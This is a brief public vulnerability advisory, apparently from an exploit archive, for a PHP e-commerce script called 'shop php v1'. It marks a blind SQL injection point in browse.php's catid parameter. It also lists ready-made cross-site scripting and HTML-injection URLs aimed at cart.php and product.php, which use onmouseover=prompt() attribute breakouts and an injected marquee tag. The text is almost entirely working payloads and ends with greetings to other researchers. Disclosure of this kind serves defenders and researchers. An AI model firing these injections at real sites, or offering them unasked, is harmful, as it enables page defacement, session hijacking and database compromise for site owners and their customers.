=================================================================
| # Title : shop php v1(ir) MUlti Vulnerability
| # Author : indoushka
| # Vondor : http://www.mspsoft.ir
================================================================
Blind SQL Injection :
localhost/shop-php/browse.php?catid=if&start=0 (inject her)
Cross site scripting :
/shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22
/shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22
XSS / HTML Inject :
http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================